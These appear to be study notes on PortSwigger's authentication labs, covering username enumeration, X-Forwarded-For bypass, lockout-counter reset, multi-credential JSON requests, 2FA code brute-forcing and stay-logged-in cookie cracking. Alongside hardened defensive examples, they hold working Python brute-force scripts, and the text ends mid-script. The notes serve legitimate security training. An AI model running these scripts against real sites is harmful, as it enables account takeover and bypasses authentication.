[TOC]
# Basic Concept
## Logic Views
Stealing password reset tokens.
![圖片](https://hackmd.io/_uploads/BydO1XtlA.png)
## Authentication Factors
Common authentication factors
**Something we know**
- Password
**Something we have**
- Mobile phone or security token
**Something we are or can do**
- Biometrics or behaviour
## Authentication && Authorization
**Authentication**
Authentication is the process of verifying a user's identity.
**Authorization**
Once the user is authenticated, their privileges determine what they are authorized to do.
## Vulnerabilities Arise
### No brute-force protection
### Program logic flaws
The program lets an attacker leverage unexpected behaviour to bypass authentication.
## Impact
### Low-privilege accounts
A low-privilege account lets an attacker steal personal information, money, and so on.
### Admin account (goal)
Once we have an admin account, we can attempt to modify the website configuration or upload a web shell,
i.e. find a way to run arbitrary code on the website.
# Password-based Vulnerabilities
## Weakness
It allows an attacker to enumerate usernames and crack passwords with a brute-force attack.
## Brute Force Attack
### Username Enumeration
This vulnerability typically occurs on the forgot-password page!
```
admin@somecompany.com
```
### Password Policy (High-Entropy password)
If the website lets us register an account,
we can use that functionality to learn the password policy.
### Observations when performing a brute-force attack
- Status code
- Error message
- Response time
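The three signals above are exactly what a login handler must not vary. The following is an added example (not from the original note) of a handler that leaks account existence beside a hardened one, with the check a tester would run to compare the two responses; the user store and PBKDF2 cost are constructed for the demo.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # PBKDF2 cost (assumption; real deployments tune this)


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: only the lab's wiener:peter account exists.
_SALT = os.urandom(16)
USERS = {"wiener": (_SALT, _hash("peter", _SALT))}

# A dummy record so unknown usernames cost the same hash work as known ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("placeholder", _DUMMY_SALT)
GENERIC_ERROR = "Invalid username or password"


def login_vulnerable(username, password):
    """Leaks existence through the message and through timing
    (unknown users return before any hashing is done)."""
    if username not in USERS:
        return 200, "Invalid username"
    salt, stored = USERS[username]
    if _hash(password, salt) != stored:
        return 200, "Incorrect password"
    return 302, "/my-account"


def login_hardened(username, password):
    """Same status, same message and same amount of hashing on every failure."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    computed = _hash(password, salt)
    ok = hmac.compare_digest(computed, stored) and username in USERS
    if not ok:
        return 200, GENERIC_ERROR
    return 302, "/my-account"


def responses_distinguish(handler):
    """The check from the text: do 'unknown user' and 'wrong password'
    produce a different status code or message?"""
    return handler("no-such-user", "x") != handler("wiener", "wrong-password")
```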
### LAB-1 Username Enumeration (Response Length)
Username wordlist
https://portswigger.net/web-security/authentication/auth-lab-usernames
Password wordlist
https://portswigger.net/web-security/authentication/auth-lab-passwords
Login page
```
POST /login HTTP/2
Host: 0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net
Cookie: session=RyZyjhbAo71qMSKopNdoJ2k9ntbDU7C1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net
Referer: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net/login
username=meowehecker&password=meowhecker
```
Response (error message)
![](https://hackmd.io/_uploads/H1lqK4SK3.png)
Invalid username -> distinct error message
#### Enumerate username
Configuration
![](https://hackmd.io/_uploads/r1byfESF2.png)
![](https://hackmd.io/_uploads/SkmLfEBFh.png)
![](https://hackmd.io/_uploads/B1o2zNHF2.png)
Perform Attack
![](https://hackmd.io/_uploads/HJzLc4HYn.png)
![](https://hackmd.io/_uploads/HymdcNrK3.png)
Username: auto (valid)
#### Password Cracking
![](https://hackmd.io/_uploads/HkYEsESK3.png)
![](https://hackmd.io/_uploads/By6SiVHKn.png)
---
sunshine -> status code 302 (temporary redirect)
![](https://hackmd.io/_uploads/rJEy2NHt3.png)
username:auto
password:sunshine
![](https://hackmd.io/_uploads/r1u8h4HFh.png)
![](https://hackmd.io/_uploads/BJlO3VSFn.png)
Solved
---
### LAB 2 Username enumeration via subtly different responses
Username wordlist
https://portswigger.net/web-security/authentication/auth-lab-usernames
Password wordlist
https://portswigger.net/web-security/authentication/auth-lab-passwords
Analyse the request/response
![](https://hackmd.io/_uploads/rJtc04Ht3.png)
**Username Enumeration**
Payload Setting
![](https://hackmd.io/_uploads/B1I-fSrFh.png)
**Find Password**
![](https://hackmd.io/_uploads/r1ZIfHHth.png)
![](https://hackmd.io/_uploads/BkZmlISYh.png)
password:killer
**login**
account:archie
password:killer
![](https://hackmd.io/_uploads/BkzceIrKn.png)
![](https://hackmd.io/_uploads/SyBogISFh.png)
Solved
## Bypass IP-based protection
The X-Forwarded-For header is used by proxies to tell the back-end service what the client IP is; if the back end trusts it from anyone, the client can set it to whatever it likes.
```
X-Forwarded-For
```
Sample code
```javascript
const express = require('express');
const app = express();

app.get('/', (req, res) => {
  // The header wins whenever it is present, so any client can claim to be 10.10.10.1
  // by sending X-Forwarded-For: 10.10.10.1 directly to this server.
  const clientIp = req.headers['x-forwarded-for'] || req.socket.remoteAddress;
  res.send(`Client IP: ${clientIp}`);
});

app.listen(3000, () => {
  console.log('Server listening on port 3000');
});
```
```
npm install express
node "app.js"
```
```bash
curl -H "X-Forwarded-For:10.10.10.1" 127.0.0.1:3000
```
![圖片](https://hackmd.io/_uploads/B1JxzBFgC.png)
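A server behind a proxy can use the header safely only when it accepts it solely from that proxy. Added example (not the note's code): resolving the client address by walking X-Forwarded-For from the right and stopping at the first hop that is not a trusted proxy, beside the naive rule from the Express snippet; the trusted proxy 10.0.0.5 and the sample addresses are constructed.

```python
import ipaddress
from typing import Optional

# Assumption for the demo: the only reverse proxy in front of the app is 10.0.0.5.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.5/32")]


def _is_trusted(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip_naive(remote_addr: str, xff: Optional[str]) -> str:
    """Mirrors the Express snippet: whatever the header says wins."""
    return xff.split(",")[0].strip() if xff else remote_addr


def client_ip_trusted(remote_addr: str, xff: Optional[str]) -> str:
    """Walk X-Forwarded-For from the right, skipping hops we trust.

    The first hop that is not one of our proxies is the client; anything to
    its left was appended by someone we do not control and is ignored.  If the
    TCP peer itself is not a trusted proxy, the header is ignored entirely."""
    if not _is_trusted(remote_addr):
        return remote_addr
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _is_trusted(hop):
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break  # garbage in the header: fall back to the proxy's address
        return hop
    return remote_addr
```

Rate limiting and IP blocking should key on the value returned by `client_ip_trusted`, never on the raw header.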
### Lab-1: Brute-force (response time) && bypass IP-based protection
- Your credentials: `wiener:peter`
- [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
- [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)
#### Site map
![圖片](https://hackmd.io/_uploads/rySajHFl0.png)
#### Dynamic Parameters
```
/login
/post
```
![圖片](https://hackmd.io/_uploads/ryxy3rYxC.png)
#### Restriction
![圖片](https://hackmd.io/_uploads/ByjQjHtg0.png)
#### Bypass the limit Restriction
Way 1: IP bypass
```
X-Forwarded-For:x
```
#### Enumerate Username Via Response Time
Attack type -> Pitchfork
Position 1 -> X-Forwarded-For value
Position 2 -> username to enumerate
![圖片](https://hackmd.io/_uploads/BksNvfqe0.png)
Potential Password
![圖片](https://hackmd.io/_uploads/H1vddM5lA.png)
```
username=ao&password=MEOWHACKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKHACKEHACKERhhhhhhhhhhhhhhhhhhhhhhhhACKER
```
Username:ao
#### Exploit - Crack Password
![圖片](https://hackmd.io/_uploads/SJVMYGqlC.png)
```
Password:michael
```
**Login**
![圖片](https://hackmd.io/_uploads/rJ3l5z9g0.png)
Solve !!!
## Bypass flawed brute-force protection
Common protection methods
### Locking account access
Bypass ways
- Password spraying
### IP block
Bypass ways
- X-Forwarded-For header
- If the website resets the failed-login counter after a successful login, we can register a valid account and add its credentials to our wordlist at regular intervals
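The reset-on-success flaw in the second bullet can be reproduced offline. Added example (not from the note) with two limiters: one that wipes its counter on any successful login and one that keeps failures in a sliding window keyed by IP and by account; `interleaved_attack` replays the wordlist pattern with a valid login after every attemptLimit-1 guesses. The credential store and the source address are constructed.

```python
import time
from collections import defaultdict, deque

# Constructed store: the lab's valid account plus a target whose password is made up.
VALID = {"wiener": "peter", "carlos": "not-on-the-page"}


class ResettingLimiter:
    """Per-IP failure counter that any successful login wipes (the flaw in the text)."""
    def __init__(self, limit):
        self.limit = limit
        self.fails = defaultdict(int)

    def allow(self, ip, user):
        return self.fails[ip] < self.limit

    def record(self, ip, user, ok):
        self.fails[ip] = 0 if ok else self.fails[ip] + 1


class WindowLimiter:
    """Failures kept for a time window, keyed by IP *and* by account.
    A success never clears them, and the per-account key still counts when
    the attacker rotates source addresses (e.g. via X-Forwarded-For)."""
    def __init__(self, limit, window_seconds=60.0):
        self.limit = limit
        self.window = window_seconds
        self.fails = defaultdict(deque)

    def _recent(self, key):
        q, now = self.fails[key], time.monotonic()
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q)

    def allow(self, ip, user):
        return (self._recent(("ip", ip)) < self.limit
                and self._recent(("user", user)) < self.limit)

    def record(self, ip, user, ok):
        if not ok:
            now = time.monotonic()
            self.fails[("ip", ip)].append(now)
            self.fails[("user", user)].append(now)


def attempt(limiter, ip, user, password):
    if not limiter.allow(ip, user):
        return "blocked"
    ok = VALID.get(user) == password
    limiter.record(ip, user, ok)
    return "success" if ok else "failed"


def interleaved_attack(limiter, target, guesses, attempt_limit):
    """Replays the wordlist pattern from the text: after every attempt_limit-1
    guesses a known-good login (wiener:peter) is sent from the same IP.
    Returns how many guesses against the target were actually evaluated."""
    ip, evaluated = "203.0.113.9", 0
    for i, guess in enumerate(guesses, start=1):
        if attempt(limiter, ip, target, guess) != "blocked":
            evaluated += 1
        if i % (attempt_limit - 1) == 0:
            attempt(limiter, ip, "wiener", "peter")
    return evaluated
```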
### LAB-1 Broken Brute-Force Protection (IP Block)
#### Site Map
![圖片](https://hackmd.io/_uploads/S15Lt4qx0.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/SJ6BFN9lR.png)
#### Identify
```
POST /login
```
![圖片](https://hackmd.io/_uploads/BywGYNqg0.png)
Attempt Limit = 3
![圖片](https://hackmd.io/_uploads/HJ_Gc45x0.png)
#### Bypass
Attempting to use X-Forwarded-For
![圖片](https://hackmd.io/_uploads/By0ejNcgA.png)
Failed
---
Attempting to use the reset mechanism to bypass the limit
Valid account `wiener:peter`
Bypass wordlist
```python
#!/usr/bin/python3
# Exploit - reset mechanism
# Some systems reset the failed-attempt counter when a user logs in successfully,
# so a known-valid password is inserted into the wordlist every (attemptLimit - 1) entries.
import argparse


class Color:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'


def meowBanner():
    print(Color.HEADER + "##################################################")
    print("#                                                #")
    print("#        " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + "                #")
    print("#                                                #")
    print("##################################################" + Color.ENDC)
    print(Color.WARNING + "-> Author: Meowhecker\n" + Color.ENDC)


def readWordlistToList(filePath):
    """Read one candidate per line, stripping the trailing newline."""
    words = []
    try:
        with open(filePath, "r") as wordlist:
            for line in wordlist:
                words.append(line.rstrip())  # remove "\n"
        print("List:", words)
        return words
    except FileNotFoundError:
        print("File not found:", filePath)
    except Exception as e:
        print("Error", e)
    return []


def MakeBypassWordList(originalWordList, BypassWordlistPath, attemptLimit, valid):
    """Write the wordlist, inserting the valid password after every
    (attemptLimit - 1) candidates so the counter is reset before it trips."""
    Counter = 0
    with open(BypassWordlistPath, 'w') as bypassWordlist:
        # enumerate() walks the whole list and assigns an index (starting at 1)
        for Counter, line in enumerate(originalWordList, start=1):
            bypassWordlist.write(line + '\n')
            # Condition -> insert the valid string
            if Counter % (attemptLimit - 1) == 0:
                bypassWordlist.write(valid + '\n')
    print("BypassWordlist Done !")
    return Counter  # number of candidate lines (used to size the username list)


def MakeUsernameWordlist(TargetUserName, ValidUserName, bypassWordlistLinesNum, attemptLimit, userWordlistPath):
    """Write a username list aligned line-for-line with the bypass wordlist."""
    with open(userWordlistPath, 'w') as userWordlist:
        for Counter in range(1, bypassWordlistLinesNum + 1):
            userWordlist.write(TargetUserName + '\n')
            if Counter % (attemptLimit - 1) == 0:
                userWordlist.write(ValidUserName + '\n')
    print("UserWordlist - Done !")


# Main
# Configure parameters
parsers = argparse.ArgumentParser(description='Meowhecker is a Cat')
parsers.add_argument("attemptLimit", type=int)
parsers.add_argument("valid", type=str)
parsers.add_argument("targetUserName", type=str)
parsers.add_argument("validUserName", type=str)
parsers.add_argument("-O", "--originalWordList", default="./defaultWordlist.txt")
parsers.add_argument("-B", "--bypassWordlist", default="./bypassWordlist.txt")
parsers.add_argument("-U", "--userWordlist", default="./userWordlist.txt")
args = parsers.parse_args()
if args.attemptLimit < 2:
    parsers.error("attemptLimit must be at least 2")

meowBanner()
DefaultWordList = readWordlistToList(args.originalWordList)
bypassWordlistLinesNum = MakeBypassWordList(DefaultWordList, args.bypassWordlist, args.attemptLimit, args.valid)
MakeUsernameWordlist(args.targetUserName, args.validUserName, bypassWordlistLinesNum, args.attemptLimit, args.userWordlist)
```
Run the following command
```
python3 addingValidBypassIpBlock.py 2 peter carlos wiener
```
![圖片](https://hackmd.io/_uploads/rkoxDpsgA.png)
Threads = 1 (important: the requests must stay in order)
![圖片](https://hackmd.io/_uploads/HyDHiioeR.png)
![圖片](https://hackmd.io/_uploads/BJaAqoilC.png)
![圖片](https://hackmd.io/_uploads/Sk-Eqsjl0.png)
#### Login
![圖片](https://hackmd.io/_uploads/HywO5osxC.png)
Successful
### LAB-2 Enumerate username via account lock
#### Site Map
![圖片](https://hackmd.io/_uploads/B1evWnjlC.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/SJPobnjgR.png)
#### Identify
Confirm defence mechanisms
![圖片](https://hackmd.io/_uploads/SJ4IWnolR.png)
Test whether the website has account locking
![圖片](https://hackmd.io/_uploads/SkETm3sgR.png)
![圖片](https://hackmd.io/_uploads/H1NEE3jeR.png)
The website has account locking
Username:albuquerque
Crack the password
![圖片](https://hackmd.io/_uploads/r1k042slA.png)
Attempt to log in to the website with
```
albuquerque:1qaz2wsx
```
Login
![圖片](https://hackmd.io/_uploads/H1nZShieA.png)
Solved
## Rate limiting
Rate limiting is typically enforced by blocking the IP address of a client that sends too many requests.
Bypass ways
1. Time-controlled script (stay under the limit).
2. Carry multiple credentials in a single HTTP request.
3. Race condition
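The second bypass works only when the login endpoint accepts a JSON array where a single string is expected. Added example (not the note's code): the permissive handler that bypass relies on, beside one that enforces exactly one scalar credential per request; the account store is constructed.

```python
import json

# Constructed account; the lab's real password is not on the page.
VALID = {"carlos": "not-on-the-page"}


def login_vulnerable(body):
    """Checks every value it is handed: a JSON array of passwords costs one
    request against the rate limit but evaluates the whole list."""
    data = json.loads(body)
    user, pw = data.get("username"), data.get("password")
    candidates = pw if isinstance(pw, list) else [pw]
    for candidate in candidates:
        if VALID.get(user) == candidate:
            return {"status": 302, "matched": candidate}
    return {"status": 200, "matched": None}


def login_hardened(body, max_len=128):
    """Exactly one scalar credential per request; anything else is a 400
    before any password comparison happens."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return {"status": 400, "error": "malformed JSON"}
    if not isinstance(data, dict) or set(data) != {"username", "password"}:
        return {"status": 400, "error": "unexpected fields"}
    user, pw = data["username"], data["password"]
    if not isinstance(user, str) or not isinstance(pw, str):
        return {"status": 400, "error": "credentials must be strings"}
    if len(user) > max_len or len(pw) > max_len:
        return {"status": 400, "error": "field too long"}
    if VALID.get(user) == pw:   # real code compares against a password hash
        return {"status": 302, "matched": True}
    return {"status": 200, "matched": False}


def multi_credential_body(username, wordlist):
    """The request body the wordlist-to-JSON script further down produces."""
    return json.dumps({"username": username, "password": wordlist})
```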
### LAB-1 Bypass rate limiting via multiple credentials per request
#### Site Map
![圖片](https://hackmd.io/_uploads/H1Tk90oxA.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/S1yZ9RsgR.png)
#### Identify
**Confirm defence mechanisms**
IP block / rate limit
![圖片](https://hackmd.io/_uploads/By_7qAsg0.png)
-> JSON format (credentials)
**Bypass**
Carry multiple credentials in one HTTP request
Convert wordlist.txt to a JSON list
```python
import json

filePath = "./wordlist.txt"


class Color:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'


def meowBanner():
    print(Color.HEADER + "##################################################")
    print("#                                                #")
    print("#        " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + "                #")
    print("#                                                #")
    print("##################################################" + Color.ENDC)
    print(Color.WARNING + "-> Author: Meowhecker\n" + Color.ENDC)


def readWordlistToList(filePath):
    """Read one candidate per line, stripping the trailing newline."""
    words = []
    try:
        with open(filePath, "r") as wordlist:
            for line in wordlist:
                words.append(line.rstrip())  # remove "\n"
        return words
    except FileNotFoundError:
        print("File not found:", filePath)
    except Exception as e:
        print("Error", e)
    return []


def convertListToJson(pythonList):
    """Serialise the list so it can be pasted as the password value of the JSON body."""
    if pythonList:
        return json.dumps(pythonList)
    print("No python list")
    return None


# Main
meowBanner()
wordlist = readWordlistToList(filePath)
jsonList = convertListToJson(wordlist)
print("JSON list:", jsonList)
```
Result
![圖片](https://hackmd.io/_uploads/ByJhq0slA.png)
#### Exploit
![圖片](https://hackmd.io/_uploads/HJS1rCoeC.png)
![圖片](https://hackmd.io/_uploads/ByysF0olA.png)
![圖片](https://hackmd.io/_uploads/S1spYAoeC.png)
Solved
# Multi-Factor Authentication Vulnerabilities
## 2FA (two-factor authentication)
Flawed design:
Email verification code + password (both knowledge factors) ->
## Two-factor authentication tokens
(Password - something we know) (Device verification code - something we have)
Attacks
1. SIM card hijacking
2. Message interception
### LAB-1 Bypass via flawed session check
Valid Credentials
-> wiener:peter
Target Accounts
-> carlos:montoya
#### Site Map
![圖片](https://hackmd.io/_uploads/SyfsuJRe0.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/Sy-6dJ0g0.png)
#### Identify
![圖片](https://hackmd.io/_uploads/Hy3VtyRxR.png)
![圖片](https://hackmd.io/_uploads/HJswFJCgC.png)
**Confirm Defense Mechanisms**
The website has 2FA
Flawed design
-> Password (we know)
-> Email code (we know)
Bypass possible!
**Bypass**
Test 1
Changing the parameter to carlos (IDOR)
![圖片](https://hackmd.io/_uploads/rJ_0YyClA.png)
Fail!!
The page is redirected to the login page
---
Test 2
Testing the session parameter
![圖片](https://hackmd.io/_uploads/SyQYsJAl0.png)
![圖片](https://hackmd.io/_uploads/HkVNa1ClA.png)
![圖片](https://hackmd.io/_uploads/BkV_ak0lA.png)
Works
The /account page didn't check whether the session had passed the login2 check (no flag) & IDOR -> lets us bypass the email code check!
#### Exploit
Log in to carlos's account
![圖片](https://hackmd.io/_uploads/Hk1Q2y0lC.png)
![圖片](https://hackmd.io/_uploads/rkaK3JCxC.png)
![圖片](https://hackmd.io/_uploads/B1kkpy0lR.png)
Solved!
## Flawed Two-Factor Verification Logic
![圖片](https://hackmd.io/_uploads/HkDlQeCxA.png)
### LAB-1 GET /login2 can trigger carlos's email verification code (flawed logic)
credentials: wiener:peter
Victim's username: carlos
#### Site Map
![圖片](https://hackmd.io/_uploads/HycBreAxC.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/rJDIHl0eC.png)
#### Identify
Testing the authentication functionality.
**Confirm defence mechanisms**
The website has 2FA
Flawed design
-> Password (we know)
-> Email code (we know) (GET /login2)
Same factor for both!
**Bypass**
![圖片](https://hackmd.io/_uploads/H1wH8gAlR.png)
![圖片](https://hackmd.io/_uploads/B1GcLx0eC.png)
![圖片](https://hackmd.io/_uploads/BJtXwgRlC.png)
Brute forcing -> guessing the valid code
![圖片](https://hackmd.io/_uploads/rkNIwgRgR.png)
We found it
![圖片](https://hackmd.io/_uploads/rJvsYlCxR.png)
Another way
```python
# Author: MeowHecker 侯智晟
# Bypass 2FA auth by guessing the 4-digit code
import requests
import threading
import sys

url = "https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2"
# Headers copied from the browser request (leading spaces removed; Content-Length
# is dropped because requests computes it for every body).
Headers = {
    'Host': '0ae900ed033f23288166aceb000b003c.web-security-academy.net',
    'Cookie': 'verify=carlos; session=706d8zav60yMRSaANT9QUOdIQVYkXLhw',
    'Cache-Control': 'max-age=0',
    'Sec-Ch-Ua': '"Not_A Brand";v="8", "Chromium";v="120"',
    'Sec-Ch-Ua-Mobile': '?0',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'https://0ae900ed033f23288166aceb000b003c.web-security-academy.net',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document',
    'Referer': 'https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
    'Priority': 'u=0, i',
}
requestTimes = 0
counterLock = threading.Lock()


def sendRequest(payload, sem):
    global requestTimes
    payloads = {
        "Payload": payload  # form field name left as in the original script
    }
    try:
        # Send the request and keep the response
        response = requests.post(url, headers=Headers, data=payloads)
        with counterLock:
            requestTimes += 1
            print(f'Request {requestTimes}: status code: {response.status_code} payload: {payload}')
        # Target / success? A non-200 status is the signal that the code was accepted
        if response.status_code != 200:  # found
            print(f"Payload: {payload}, Response: {response.text}")
    finally:
        sem.release()  # free the slot even if the request raised


def threadingF():
    maxThreading = 20
    sem = threading.BoundedSemaphore(maxThreading)
    for i in range(10000):
        # Custom payload: zero-padded 4-digit code
        payload = str(i).zfill(4)
        sem.acquire()
        sendRequestHandler = threading.Thread(target=sendRequest, args=(payload, sem))
        sendRequestHandler.start()
        print("Number of active threads:", threading.active_count())


threadingF()
sys.exit()
```
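Both flaws in this section (the /account page not checking that login2 was passed, and the code being tied to a client-controlled verify cookie instead of the session) come from keeping MFA state on the client. Added example (not from the note): a server-side session that records the password and MFA stages separately, binds the code to the session's own user, caps code guesses, and serves /account only when both stages are complete. The credentials are the lab's; the session store and the attempt budget are assumptions.

```python
import hmac
import secrets

USERS = {"wiener": "peter", "carlos": "montoya"}   # lab accounts, plain text for the demo only
SESSIONS = {}                                       # session id -> state, held server-side (assumption)
MAX_CODE_ATTEMPTS = 3                               # assumed budget before the session is discarded


def login(username, password):
    """Stage 1: password check. The session records that MFA is still pending
    and carries the code for *this* user; no 'verify=<user>' cookie is issued."""
    if USERS.get(username) != password:
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {
        "user": username,
        "mfa_ok": False,
        "code": f"{secrets.randbelow(10000):04d}",   # what the e-mail would carry
        "code_tries": 0,
    }
    return sid


def current_code(sid):
    """Exposed only so the demo can play the role of the mailbox."""
    return SESSIONS[sid]["code"]


def login2(sid, submitted_code):
    """Stage 2: the code is checked against the session's own user with a
    hard attempt budget; exhausting it forces a fresh password login."""
    state = SESSIONS.get(sid)
    if state is None or state["mfa_ok"]:
        return False
    state["code_tries"] += 1
    if state["code_tries"] > MAX_CODE_ATTEMPTS:
        SESSIONS.pop(sid)
        return False
    if hmac.compare_digest(state["code"], submitted_code):
        state["mfa_ok"] = True
        return True
    return False


def account_page(sid, requested_user=None):
    """Only a session that passed both stages gets in, and only for its own
    user: an id parameter naming someone else is refused (no IDOR)."""
    state = SESSIONS.get(sid)
    if state is None or not state["mfa_ok"]:
        return 302, "/login"
    if requested_user is not None and requested_user != state["user"]:
        return 403, "forbidden"
    return 200, f"account:{state['user']}"
```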
#### Exploit
![圖片](https://hackmd.io/_uploads/SJicYe0xA.png)
Solved
### LAB-2 2FA bypass with a CSRF token present
Victim's credentials: `carlos:montoya`
#### Site Map
#### Dynamic Parameters
#### Identify
**Confirm Defense Mechanisms**
CSRF token!
But the CSRF token does not stop the brute force
![圖片](https://hackmd.io/_uploads/ryHlefCxC.png)
Use a macro to automatically grab the token
**Bypass**
![圖片](https://hackmd.io/_uploads/Hkatw7RxC.png)
Using a macro to handle the CSRF problem
![圖片](https://hackmd.io/_uploads/B1JH-mAeC.png)
![圖片](https://hackmd.io/_uploads/HyNsIm0gC.png)
![圖片](https://hackmd.io/_uploads/BkB-fXReA.png)
#### Exploit
Note: each time we test, the verification code is reset, so we may need to repeat the attack several times
Threads = 1
# Other Authentication Mechanisms
## Cookie login!
The "keep me logged in" functionality is typically implemented with a cookie.
If the cookie value can be analysed, we can guess the victim's cookie and log in as the victim.
Cookie - flawed design
-> Encoding only
-> Hash (without a salt)
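Added example (not the note's code) showing why the lab's cookie format, base64(username:md5(password)), is reversible, beside a remember-me token that carries no identity at all: a random value stored server-side only as its SHA-256, bound to a user and an expiry. The token store and TTL are assumptions.

```python
import base64
import hashlib
import secrets

REMEMBER_TOKENS = {}    # sha256(token) -> {"user": ..., "expires": ...}  (assumed server-side store)
TOKEN_TTL = 30 * 86400  # 30 days (assumption)


def weak_cookie(username, password):
    """The format observed in the lab: base64(username ':' md5(password))."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()


def decode_weak_cookie(cookie):
    """Anyone holding the cookie recovers the username and an unsalted MD5
    that can be matched offline against a wordlist."""
    user, _, digest = base64.b64decode(cookie).decode().partition(":")
    return user, digest


def issue_remember_token(username, now):
    """Random token; only its hash is stored, so neither the cookie nor a
    leaked store reveals a password or lets a token be forged."""
    token = secrets.token_urlsafe(32)
    key = hashlib.sha256(token.encode()).hexdigest()
    REMEMBER_TOKENS[key] = {"user": username, "expires": now + TOKEN_TTL}
    return token


def verify_remember_token(token, now):
    key = hashlib.sha256(token.encode()).hexdigest()
    record = REMEMBER_TOKENS.get(key)
    if record is None or now > record["expires"]:
        return None
    return record["user"]


def revoke_all(username):
    """A password change or 'log out everywhere' drops every token for the user."""
    for key in [k for k, v in REMEMBER_TOKENS.items() if v["user"] == username]:
        del REMEMBER_TOKENS[key]
```

The cookie should additionally be set with HttpOnly, Secure and SameSite so it is not readable by injected script.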
### LAB-1 Brute-forcing a stay-logged-in cookie (the cookie can be cracked)
Valid credentials: wiener:peter
Victim's username: carlos
https://portswigger.net/web-security/authentication/auth-lab-passwords
#### Site Map
![圖片](https://hackmd.io/_uploads/S1J6E4ReR.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/BJwnNNAlR.png)
#### Identify
![圖片](https://hackmd.io/_uploads/Bk4-P4AeR.png)
**Confirm Defense Mechanisms**
Basic password authentication
The user cookie is not properly protected (reversible encoding, unsalted hash)!!
**Bypass**
Analyse the stay-logged-in cookie
![圖片](https://hackmd.io/_uploads/HyLFwVCxR.png)
Base64 decoded!!
```
wiener:51dc30ddc473d43a6011e9ebba6ca770
```
![圖片](https://hackmd.io/_uploads/BkuV_4RlR.png)
The password is hashed with MD5
#### Exploit
```python
import hashlib
import base64


class Banner:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'

    def __init__(self):
        self.meow_banner()

    def meow_banner(self):
        print(self.HEADER + "##################################################")
        print("#                                                #")
        print("#        " + self.GREEN + "MeowHecker is a cat. ^O^" + self.HEADER + "                #")
        print("#                                                #")
        print("##################################################" + self.ENDC)
        print(self.WARNING + "-> Author: Meowhecker\n" + self.ENDC)


def readWordlistToList(filePath):
    """Read one candidate per line, stripping the trailing newline."""
    words = []
    try:
        with open(filePath, "r") as wordlist:
            for line in wordlist:
                words.append(line.rstrip())  # remove "\n"
        return words
    except FileNotFoundError:
        print("File not found:", filePath)
    except Exception as e:
        print("Error", e)
    return []


def readWordlistToHashList(wordlist):
    """MD5 every candidate; md5() needs bytes, hence .encode()."""
    hashList = []
    for string in wordlist:
        hashList.append(hashlib.md5(string.encode()).hexdigest())
    print(hashList)
    return hashList


def writeHashListToFile(hashList, hashFilePath):
    with open(hashFilePath, 'w') as hashFile:
        for digest in hashList:
            hashFile.write(digest + '\n')


def addingPrefixBase64Encode(hashList):
    """Rebuild the cookie format seen in the lab: base64('carlos:' + md5)."""
    finalPayloadList = []
    for digest in hashList:
        prefixAndPass = 'carlos:' + digest
        finalPayloadList.append(base64.b64encode(prefixAndPass.encode()).decode())
    return finalPayloadList


def writeFinalPayloadToFile(finalPayloadList, finalPayloadPath):
    with open(finalPayloadPath, 'w') as payloadFile:
        for payload in finalPayloadList:
            payloadFile.write(payload + '\n')


banner = Banner()
filePath = "./wordlist.txt"
hashFilePath = "./hashList.txt"
finalPayloadPath = "./finalPayload.txt"
wordlist = readWordlistToList(filePath)
